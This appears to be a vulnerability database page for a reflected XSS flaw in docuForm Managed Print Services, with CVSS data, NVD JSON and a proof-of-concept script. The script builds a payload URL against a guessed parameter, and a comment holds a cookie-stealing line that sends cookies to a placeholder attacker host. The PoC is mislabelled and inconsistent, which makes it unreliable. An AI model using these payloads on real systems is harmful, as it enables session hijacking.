Security Vulnerability Report
中文
CVE-2025-61310 CVSS 6.1 MEDIUM

CVE-2025-61310

Published: 2026-05-11 16:17:28
Last Modified: 2026-05-12 15:05:31

Description

A reflected cross-site scripted (XSS) vulnerability in the acc-menu_billings.php component of GmbH Mecury Managed Print Services (docuForm) v11.11c allows attackers to execute arbitrary Javascript in the context of a user's browser via injecting a crafted payload into an unfiltered variable value.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

GmbH Mecury Managed Print Services (docuForm) v11.11c

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- // Proof of Concept for CVE-2025-61310 // Target: GmbH Mecury Managed Print Services (docuForm) v11.11c // Vulnerable Component: acc-menu_billings.php --> <html> <body> <h2>CVE-2025-61310 PoC - Reflected XSS</h2> <p>This PoC demonstrates how an unfiltered variable in acc-menu_billings.php can lead to XSS.</p> <script> // Step 1: Define the payload to be executed // In a real attack scenario, this could be cookie stealing code: <script>document.location='http://attacker/?c='+document.cookie</script> var xssPayload = "<img src=x onerror=alert('CVE-2025-61310_XSS_Executed')>"; // Step 2: Identify the vulnerable endpoint and parameter // Assuming the vulnerable parameter is 'id' based on typical billing component structures var targetUrl = "http://target-host/docuForm/acc-menu_billings.php"; var vulnerableParam = "search_term"; // Replace with actual parameter name if known // Step 3: Construct the malicious URL var exploitUrl = targetUrl + "?" + vulnerableParam + "=" + encodeURIComponent(xssPayload); // Step 4: Output the link for the victim to click (Simulating the attack vector) document.write("Click to trigger exploit: <a href='" + exploitUrl + "'>" + exploitUrl + "</a>"); // Optional: Automatically redirect for testing purposes (Caution: Do not use in production) // window.location.href = exploitUrl; </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61310", "sourceIdentifier": "[email protected]", "published": "2026-05-11T16:17:28.317", "lastModified": "2026-05-12T15:05:31.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripted (XSS) vulnerability in the acc-menu_billings.php component of GmbH Mecury Managed Print Services (docuForm) v11.11c allows attackers to execute arbitrary Javascript in the context of a user's browser via injecting a crafted payload into an unfiltered variable value."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://ZeroBreach.de", "source": "[email protected]"}, {"url": "https://gist.github.com/ZeroBreach-GmbH/9d68c717a402aab13eb0d4771a08fc79", "source": "[email protected]"}, {"url": "https://www.docuform.de/", "source": "[email protected]"}]}}